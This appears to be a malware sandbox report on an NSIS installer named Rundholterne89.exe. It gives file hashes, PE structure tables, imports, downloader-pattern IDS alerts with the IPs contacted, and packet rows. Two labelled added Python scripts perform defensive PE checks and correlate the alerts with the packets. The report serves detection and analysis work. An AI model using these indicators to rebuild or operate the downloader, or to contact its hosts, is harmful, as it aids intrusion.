SHA-256: 016DE5BD5CEBA70CD0041265F69BE3BB6FF54D3DCA19340ED44DC15317066E45
SHA-512: 045E39931094C1D423D69C4BEF750CACF56E0DEF562162211F51F1B5E0C3E265ACEDE7FC06979CFCE68762A99180317419685E5542D3E44882B11116D1EE7FE8
Malicious: false
                                                                                          Preview:....7.................3.........}.......Q.....................~........y.........u...4...bp..o......z.......................................................k.............Tg.....`..Q.........<........A........f.....X..."..............^.........@....|..........................h....X..................1.......zh...........3..>..)...Y....:.................GG.....+F#...z.~.....!....................:..............(.................Y....7.......5..^..{.......D...`................O..............z#..............4$...a..............o....................c..s.......=......^..~..................................B....o.......................................l:...........*Y..i.".C..i............_.........).....-...............|P.......b......h....~.....w+....................-....1.......<...6.........b.".@...................1...P....s..h9.......l........H..................k...e........<.......f...;...............m....W...........h.g.%...........-........."..................S......F.....e........
                                                                                          Process:C:\Users\user\Desktop\Rundholterne89.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):411197
                                                                                          Entropy (8bit):3.2412073600303604
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:QuopzWTN5dkmo9X81LoYHLr0FJfFYcRQOD:KkxkfDEC
                                                                                          MD5:9548F6F7A71852794789DE0AC5FDE451
                                                                                          SHA1:74C915E2C9C110929FD87C907BE17930B0B66B24
                                                                                          SHA-256:2D3371072047972236B2BAD7280E34BA1FD041C99CD132BC0E1DD767D0AFC471
                                                                                          SHA-512:0468FCA29C3F916CBC0B3B132EA24BB582ED0F0D4921523F5DF6EE17F76709437D25324E08AF3C43FCAE8BD1B9F388E49B64ED3C8464062E7D099B0D6B9BC5DE
                                                                                          Malicious:false
                                                                                          Preview:....u*...........................*................................#.k4..`.......K....................7F#.....-....................Z.........v.................#.............p...<.....5.j...........p....j....... 4.....h................q.2.......C..................................,.............\........#..................e..........b.........................o..8.e........'.Q......<..........e.x...8......=.......}.....QU......E.....O............................6....^.y.....~........i..........................Q..`.>...........m..........,................6/..._..f....\.........`.y.............................6...............2[........................)..........................<....7......6..................8.....................................b...........................3.....U.......N.........k8.x.........................)~..............o.....+.............6............Y.>....................e.J....S...t..........K........................P\.............r...................... ............
                                                                                          Process:C:\Users\user\Desktop\Rundholterne89.exe
                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x512, components 3
                                                                                          Category:dropped
                                                                                          Size (bytes):15845
                                                                                          Entropy (8bit):7.693658939604953
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:dnSPb8riksvdEh0qrjVqIPrLgrpNQMUBWud20p:dnUwriksvMjrZqo3Up9U8ud20p
                                                                                          MD5:762778DFE1B62D3430B44A32AEDC03E0
                                                                                          SHA1:7317D9579F9F4C4BEF82BE64FB3DFFB63160EEC5
                                                                                          SHA-256:9A602EBAFC1F46AAD7248F6DA82938CE382DE9FFBC6C472BD4848D4519CA67A8
                                                                                          SHA-512:B39A8F6DC07F3A4CFE3CF5E1563543ECE2864FECED28282356FA64D7D0B50FA43B70F57FC8A2C4424A553E14E6BE526293D90F56C63994EC79F5520488EE0CCF
                                                                                          Malicious:false
                                                                                          Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..IE..'...Ph.....(....(...)(...(....(...J`.QI@.(....(.....(....(....)(...).f..(.......Q@.%.P.IE..RQE...Q@..).RQE...Q@.%.P.IE...%.P.IE..RQE.mQE..bQE..QE%..QE......QE%..QE.......QI@..Q@.%.P.IE..RQE..QI@..RP.E.....RS.i(...%.P.IE%.-%.P.IE..RQE...Q@..).RQE...Q@.%.P0....J(...-%.P.IE...IE..aE...QE..QE%..QE.%.Q@...S...J..QI@.IE..RQE...Q@..RP.E...QE%0.(...%...-%...QE..RQE...Q@.%.P0
                                                                                          Process:C:\Users\user\Desktop\Rundholterne89.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):340868
                                                                                          Entropy (8bit):7.658610751329724
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:HP+VoRJRmCwM6PiJ5JsAPmxI26uHwKZUu36NbST5CFgX29:UoR/m9PiJ5Js5xhFwKZMNy0gG9
                                                                                          MD5:D3086578D45D821207EAC6CBB8E24A2B
                                                                                          SHA1:0772CBCE5403EDAE1AAB6310B2F58D7F99C726C0
                                                                                          SHA-256:E856FC4F6B157E7799C1AF872064CD1BE9F982B1A5D18D7B16E5C3A48E3A1B1A
                                                                                          SHA-512:7DB853BECC19B209C0534C8F09635C55DAB9BC540BD138054C2E84BBFC396BFA587BD4549A7188824F95271C04894BB7C66795F75267BCA16620BC27ED38807D
                                                                                          Malicious:false
                                                                                          Preview:.BB......................^^.........................................ZZZZ...lll.....u......CCC......777777.....................................|.....................PPPPP........A....w..$$...00.c.>........................{{{{.````..........S.8..kk...q..........................H......V..p.................A..........................~......?...[[[............E............................ooooo...........%%.........p....8.................VV....I....k..............UUUU......"..&....v..........hh.....b.............q.....................=.....gg..............._.<<..QQQ.............Y.................p...............22...............XX...................................aa...........V.............)... .........c."...........a...^^^........ww...pp.............JJJ....................mm....{.>>.xx.......~~~.............WW........................................E.^.....c....:...L....1.......................+.............///...a....................<.F......M.22........l...............2.__..............
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Entropy (8bit):7.7193229791674485
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:Rundholterne89.exe
                                                                                          File size:891'148 bytes
                                                                                          MD5:a1e239c4d5116e289ce0597a92844ede
                                                                                          SHA1:4562d452ccc32512291c3165a0b9b3c076b28094
                                                                                          SHA256:1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904
                                                                                          SHA512:500ddcdc2f1e3ca0da0a43006b99c6e78697433fc0757d25ddff94190dd2d725799faf267efdfacdef758e9024591368454f14025662cc6a1309bce7863494d2
                                                                                          SSDEEP:24576:/75JHVcDo1hTW+VeQ9Ke+alCJmvulW6Nd0vd:jDHVUW/VrKe+m7mwMAd
                                                                                          TLSH:8C152286F764DDB7E831527010BEA932E1716C728161920737A97F7A883373E0D4B6CA
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....{.W.................`...|.....
                                                                                          Icon Hash:4ccc524656d64e01
                                                                                          Entrypoint:0x40310f
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x57807BD9 [Sat Jul 9 04:21:45 2016 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                                                          Instruction
                                                                                          sub esp, 00000184h
                                                                                          push ebx
                                                                                          push esi
                                                                                          push edi
                                                                                          xor ebx, ebx
                                                                                          push 00008001h
                                                                                          mov dword ptr [esp+18h], ebx
                                                                                          mov dword ptr [esp+10h], 00409198h
                                                                                          mov dword ptr [esp+20h], ebx
                                                                                          mov byte ptr [esp+14h], 00000020h
                                                                                          call dword ptr [004070A8h]
                                                                                          call dword ptr [004070A4h]
                                                                                          cmp ax, 00000006h
                                                                                          je 00007F880CDD9FD3h
                                                                                          push ebx
                                                                                          call 00007F880CDDCF41h
                                                                                          cmp eax, ebx
                                                                                          je 00007F880CDD9FC9h
                                                                                          push 00000C00h
                                                                                          call eax
                                                                                          mov esi, 00407298h
                                                                                          push esi
                                                                                          call 00007F880CDDCEBDh
                                                                                          push esi
                                                                                          call dword ptr [004070A0h]
                                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                                          cmp byte ptr [esi], bl
                                                                                          jne 00007F880CDD9FADh
                                                                                          push ebp
                                                                                          push 00000009h
                                                                                          call 00007F880CDDCF14h
                                                                                          push 00000007h
                                                                                          call 00007F880CDDCF0Dh
                                                                                          mov dword ptr [0042E404h], eax
                                                                                          call dword ptr [00407044h]
                                                                                          push ebx
                                                                                          call dword ptr [00407288h]
                                                                                          mov dword ptr [0042E4B8h], eax
                                                                                          push ebx
                                                                                          lea eax, dword ptr [esp+38h]
                                                                                          push 00000160h
                                                                                          push eax
                                                                                          push ebx
                                                                                          push 00428828h
                                                                                          call dword ptr [00407174h]
                                                                                          push 00409188h
                                                                                          push 0042DC00h
                                                                                          call 00007F880CDDCB37h
                                                                                          call dword ptr [0040709Ch]
                                                                                          mov ebp, 00434000h
                                                                                          push eax
                                                                                          push ebp
                                                                                          call 00007F880CDDCB25h
                                                                                          push ebx
                                                                                          call dword ptr [00407154h]
                                                                                          Programming Language:
                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                                          Name | Virtual Address | Virtual Size | Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7534 | 0xa0 | .rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x42000 | 0x1aa58 | .rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                          .text | 0x1000 | 0x5fdd | 0x6000 | 38462d04cfdbc4943d18be461d53cc3e | False | 0.6783854166666666 | data | 6.499697507009752 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rdata | 0x7000 | 0x1352 | 0x1400 | 3d134ae5961af9895950a7ee0adc520a | False | 0.4583984375 | data | 5.207538993430304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data | 0x9000 | 0x254f8 | 0x600 | 2d00401e0c64d69b6d0ccb877d9f624e | False | 0.4544270833333333 | data | 4.0323505938358934 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .ndata | 0x2f000 | 0x13000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rsrc | 0x42000 | 0x1aa58 | 0x1ac00 | 098718c0c5bf54afe6e125c2f1ac35ba | False | 0.23448452102803738 | data | 3.706045365348602 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
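The following is an added example, not part of the Joe Sandbox report or of its tooling. It reproduces three of the static checks behind the data-directory and section tables above, using the values printed in the report as constructed input: mapping a directory RVA to the section that contains it (the "Is in Section" column), the 8-bit Shannon entropy and MD5 that explain why the zero-raw-size .ndata section shows entropy 0.0 and the MD5 of empty input, and a consistency check on the DLL Characteristics: DYNAMIC_BASE is set, but the file has RELOCS_STRIPPED and an empty IMAGE_DIRECTORY_ENTRY_BASERELOC, so the loader cannot rebase it and ASLR does not apply. All function names and the constant names are my own.

```python
# Added example: static PE checks over the values the report prints above.
# Not part of the Joe Sandbox report; constants below are transcribed from it.
import hashlib
import math
from collections import Counter

# Section table from the report: (name, virtual address, virtual size, raw size)
SECTIONS = [
    (".text",  0x1000,  0x5fdd,  0x6000),
    (".rdata", 0x7000,  0x1352,  0x1400),
    (".data",  0x9000,  0x254f8, 0x600),
    (".ndata", 0x2f000, 0x13000, 0x0),
    (".rsrc",  0x42000, 0x1aa58, 0x1ac00),
]

# Data directories that are non-empty in the report: (name, RVA, size)
DIRECTORIES = [
    ("IMPORT",   0x7534,  0xa0),
    ("RESOURCE", 0x42000, 0x1aa58),
    ("IAT",      0x7000,  0x298),
]

# Header flags as listed under "Image File Characteristics" / "DLL Characteristics"
IMAGE_CHARS = ["RELOCS_STRIPPED", "EXECUTABLE_IMAGE", "LINE_NUMS_STRIPPED",
               "LOCAL_SYMS_STRIPPED", "32BIT_MACHINE"]
DLL_CHARS = ["DYNAMIC_BASE", "NX_COMPAT", "NO_SEH", "TERMINAL_SERVER_AWARE"]
BASERELOC_SIZE = 0x0  # IMAGE_DIRECTORY_ENTRY_BASERELOC virtual size


def section_for_rva(rva, sections=SECTIONS):
    """Name of the section whose virtual range contains `rva`, else None.
    This is the report's "Is in Section" column."""
    for name, va, vsize, _raw in sections:
        if va <= rva < va + vsize:
            return name
    return None


def directory_sections(directories=DIRECTORIES):
    """Map each non-empty data directory to its containing section."""
    return {name: section_for_rva(rva) for name, rva, _size in directories}


def slack_sections(sections=SECTIONS):
    """Sections whose in-memory size exceeds their on-disk size: the loader
    zero-fills the difference, which is writable scratch space an unpacker
    can use without it appearing in the file on disk."""
    return [name for name, _va, vsize, raw in sections if vsize > raw]


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 for empty input), the
    scale used by the report's "Entropy (8bit)" values."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def raw_md5(data: bytes) -> str:
    """MD5 of a section's raw bytes; a zero-raw-size section hashes the
    empty string, which is the d41d8cd9... value shown for .ndata."""
    return hashlib.md5(data).hexdigest()


def aslr_effective(image_chars, dll_chars, basereloc_size):
    """DYNAMIC_BASE only yields ASLR if the loader can rebase the image,
    which requires relocations that were not stripped and a non-empty
    base-relocation directory."""
    if "DYNAMIC_BASE" not in dll_chars:
        return False
    if "RELOCS_STRIPPED" in image_chars or basereloc_size == 0:
        return False
    return True


if __name__ == "__main__":
    print("directories:", directory_sections())
    print("slack sections:", slack_sections())
    print("empty-section MD5:", raw_md5(b""), "entropy:", shannon_entropy(b""))
    print("ASLR effective:", aslr_effective(IMAGE_CHARS, DLL_CHARS, BASERELOC_SIZE))
```

Run against the report's numbers this maps IMPORT and IAT to .rdata and RESOURCE to .rsrc, flags .data (0x254f8 virtual vs 0x600 raw) and .ndata as zero-filled slack, and reports ASLR as not effective despite DYNAMIC_BASE.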
                                                                                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                                          RT_BITMAP | 0x42460 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
                                                                                          RT_ICON | 0x427c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.09021944871643203
                                                                                          RT_ICON | 0x52ff0 | 0x32f2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9443336911516639
                                                                                          RT_ICON | 0x562e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.16089211618257263
                                                                                          RT_ICON | 0x58890 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.18738273921200752
                                                                                          RT_ICON | 0x59938 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.31050106609808104
                                                                                          RT_ICON | 0x5a7e0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.440884476534296
                                                                                          RT_ICON | 0x5b088 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.5635838150289018
                                                                                          RT_ICON | 0x5b5f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.2703900709219858
                                                                                          RT_ICON | 0x5ba58 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.21908602150537634
                                                                                          RT_ICON | 0x5bd40 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.3716216216216216
                                                                                          RT_DIALOG | 0x5be68 | 0x144 | data | English | United States | 0.5216049382716049
                                                                                          RT_DIALOG | 0x5bfb0 | 0x13c | data | English | United States | 0.5506329113924051
                                                                                          RT_DIALOG | 0x5c0f0 | 0x100 | data | English | United States | 0.5234375
                                                                                          RT_DIALOG | 0x5c1f0 | 0x11c | data | English | United States | 0.6056338028169014
                                                                                          RT_DIALOG | 0x5c310 | 0xc4 | data | English | United States | 0.5918367346938775
                                                                                          RT_DIALOG | 0x5c3d8 | 0x60 | data | English | United States | 0.7291666666666666
                                                                                          RT_GROUP_ICON | 0x5c438 | 0x92 | data | English | United States | 0.6575342465753424
                                                                                          RT_VERSION | 0x5c4d0 | 0x248 | data | English | United States | 0.5308219178082192
                                                                                          RT_MANIFEST | 0x5c718 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384
                                                                                          DLLImport
KERNEL32.dll: SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll: ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll: SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll: SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll: RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll: ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll: OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-22T16:04:14.198153+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.10 | 49709 | 142.250.185.174 | 443 | TCP
2024-10-22T16:04:19.358399+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49711 | 193.122.130.0 | 80 | TCP
2024-10-22T16:04:20.811576+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49711 | 193.122.130.0 | 80 | TCP
2024-10-22T16:04:21.520222+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49713 | 188.114.97.3 | 443 | TCP
2024-10-22T16:04:22.249021+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49714 | 193.122.130.0 | 80 | TCP
2024-10-22T16:04:22.954475+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49715 | 188.114.97.3 | 443 | TCP
2024-10-22T16:04:26.027860+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49719 | 188.114.97.3 | 443 | TCP
2024-10-22T16:04:28.905367+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49723 | 188.114.97.3 | 443 | TCP
2024-10-22T16:04:31.792925+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49727 | 188.114.97.3 | 443 | TCP
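The report lists the IDS alerts above and the raw TCP packet list separately and leaves joining the two to the analyst. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it rebuilds per-flow records from packet rows, attaches each alert to its flow with the delay from the flow's first packet, and returns the alerts whose 4-tuple has no packets in the table instead of dropping them. The embedded packet and alert rows are a constructed subset copied from this report; the client/server port heuristic, treating packet timestamps as CEST, and every function name are this example's own assumptions.

```python
"""Flow reconstruction and IDS-alert correlation over a sandbox report's
network tables. Added example; PACKETS and ALERTS are a constructed subset
of the report's TCP packet and IDS alert tables, everything else is assumed."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Tuple

CEST = timezone(timedelta(hours=2))  # packet times are printed in CEST, alerts carry +0200

# Constructed subset of the packet table: (timestamp, src_port, dst_port, src_ip, dst_ip)
PACKETS = [
    ("Oct 22, 2024 16:04:12.902620077", 49709, 443, "192.168.2.10", "142.250.185.174"),
    ("Oct 22, 2024 16:04:12.902672052", 443, 49709, "142.250.185.174", "192.168.2.10"),
    ("Oct 22, 2024 16:04:12.902757883", 49709, 443, "192.168.2.10", "142.250.185.174"),
    ("Oct 22, 2024 16:04:12.913573980", 49709, 443, "192.168.2.10", "142.250.185.174"),
    ("Oct 22, 2024 16:04:13.773917913", 443, 49709, "142.250.185.174", "192.168.2.10"),
    ("Oct 22, 2024 16:04:14.198174953", 443, 49709, "142.250.185.174", "192.168.2.10"),
    ("Oct 22, 2024 16:04:14.198261023", 49709, 443, "192.168.2.10", "142.250.185.174"),
    ("Oct 22, 2024 16:04:14.198479891", 49709, 443, "192.168.2.10", "142.250.185.174"),
    ("Oct 22, 2024 16:04:14.232996941", 49710, 443, "192.168.2.10", "142.250.186.65"),
    ("Oct 22, 2024 16:04:14.233042955", 443, 49710, "142.250.186.65", "192.168.2.10"),
    ("Oct 22, 2024 16:04:15.098956108", 443, 49710, "142.250.186.65", "192.168.2.10"),
    ("Oct 22, 2024 16:04:17.693398952", 443, 49710, "142.250.186.65", "192.168.2.10"),
]

# Constructed subset of the IDS alert table:
# (timestamp, sid, signature, severity, src_ip, src_port, dst_ip, dst_port)
ALERTS = [
    ("2024-10-22T16:04:14.198153+0200", 2803270, "ETPRO MALWARE Common Downloader Header Pattern UHCa", 2, "192.168.2.10", 49709, "142.250.185.174", 443),
    ("2024-10-22T16:04:19.358399+0200", 2803274, "ETPRO MALWARE Common Downloader Header Pattern UH", 2, "192.168.2.10", 49711, "193.122.130.0", 80),
    ("2024-10-22T16:04:20.811576+0200", 2803274, "ETPRO MALWARE Common Downloader Header Pattern UH", 2, "192.168.2.10", 49711, "193.122.130.0", 80),
    ("2024-10-22T16:04:21.520222+0200", 2803305, "ETPRO MALWARE Common Downloader Header Pattern H", 3, "192.168.2.10", 49713, "188.114.97.3", 443),
]

FlowKey = Tuple[str, int, str, int]  # (client_ip, client_port, server_ip, server_port)


def parse_packet_time(ts: str) -> datetime:
    # datetime carries microseconds only, so the three nanosecond digits are dropped
    return datetime.strptime(ts[:-3], "%b %d, %Y %H:%M:%S.%f").replace(tzinfo=CEST)


def parse_alert_time(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def flow_key(src_ip: str, src_port: int, dst_ip: str, dst_port: int) -> Tuple[FlowKey, bool]:
    """Map both directions of a connection onto one key. Assumed heuristic: the
    endpoint with the lower port (443/80 vs ephemeral 497xx) is the server.
    Returns (key, packet_goes_client_to_server)."""
    if src_port < dst_port:
        return (dst_ip, dst_port, src_ip, src_port), False
    return (src_ip, src_port, dst_ip, dst_port), True


@dataclass
class Flow:
    key: FlowKey
    first_seen: datetime
    last_seen: datetime
    to_server: int = 0
    to_client: int = 0
    alerts: List[dict] = field(default_factory=list)

    @property
    def packets(self) -> int:
        return self.to_server + self.to_client


def build_flows(packets) -> Dict[FlowKey, Flow]:
    flows: Dict[FlowKey, Flow] = {}
    for ts, sport, dport, sip, dip in packets:
        t = parse_packet_time(ts)
        key, c2s = flow_key(sip, sport, dip, dport)
        f = flows.setdefault(key, Flow(key, t, t))
        f.first_seen, f.last_seen = min(f.first_seen, t), max(f.last_seen, t)
        if c2s:
            f.to_server += 1
        else:
            f.to_client += 1
    return flows


def correlate(flows: Dict[FlowKey, Flow], alerts) -> List[dict]:
    """Attach each alert to its flow with the delay since the flow's first packet.
    Alerts whose 4-tuple has no packets in the table are returned, so a truncated
    packet list or an out-of-capture flow is visible rather than silently dropped."""
    unmatched = []
    for ts, sid, sig, sev, sip, sport, dip, dport in alerts:
        key, _ = flow_key(sip, sport, dip, dport)
        rec = {"time": parse_alert_time(ts), "sid": sid, "signature": sig, "severity": sev}
        f = flows.get(key)
        if f is None:
            unmatched.append({**rec, "flow": key})
            continue
        rec["seconds_after_flow_start"] = (rec["time"] - f.first_seen).total_seconds()
        f.alerts.append(rec)
    return unmatched


if __name__ == "__main__":
    flows = build_flows(PACKETS)
    unmatched = correlate(flows, ALERTS)
    for (cip, cport, sip, sport), f in sorted(flows.items(), key=lambda kv: kv[1].first_seen):
        print(f"{cip}:{cport} -> {sip}:{sport}  {f.packets} pkts ({f.to_server} out / {f.to_client} in)")
        for a in f.alerts:
            print(f"    SID {a['sid']} sev {a['severity']} at +{a['seconds_after_flow_start']:.3f}s: {a['signature']}")
    for a in unmatched:
        print(f"alert SID {a['sid']} on {a['flow']}: no packets for this flow in the table")
```

On this subset the 49709 flow to 142.250.185.174:443 gets its UHCa alert about 1.3 s after the first client packet, while the alerts on 49711 and 49713 come back unmatched because those flows are not in the packet rows embedded here. The lower-port-is-server rule is enough for the 443/80 against 497xx pairs in this report but would need a SYN-based check on traffic where both sides use low ports.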
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 22, 2024 16:04:12.902620077 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174
Oct 22, 2024 16:04:12.902672052 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10
Oct 22, 2024 16:04:12.902757883 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174
Oct 22, 2024 16:04:12.913573980 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174
Oct 22, 2024 16:04:12.913589001 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10
